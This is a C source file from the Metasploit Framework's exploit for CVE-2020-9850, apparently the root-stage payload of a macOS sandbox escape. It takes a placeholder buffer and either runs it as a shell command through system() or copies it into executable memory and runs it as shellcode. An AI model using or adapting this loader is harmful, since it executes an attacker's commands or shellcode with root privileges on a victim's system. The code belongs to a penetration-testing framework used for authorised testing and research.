metasploit-framework/external/source/exploits/CVE-2020-9850/payload/sbx/root/main.c

#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>

char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";
void run_payload() {
  if (!strncmp(root_payload, "CMD:", 4)) {
    system(root_payload + 4);
  } else {
		if (root_payload[0] == 'R' &&
			root_payload[1] == 'O' &&
			root_payload[2] == 'O' &&
			root_payload[3] == 'T') {
			/*system("open /System/Applications/TextEdit.app");*/
			/*system("open /System/Applications/Calculator.app");*/
			return;
		}
    void *ptr = mmap(0, sizeof(root_payload), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        return;
    }
    memcpy(ptr, root_payload, sizeof(root_payload));
    int (*sc)() = ptr;
    sc();
  }
}


int main() {
	run_payload();
	return 0;
}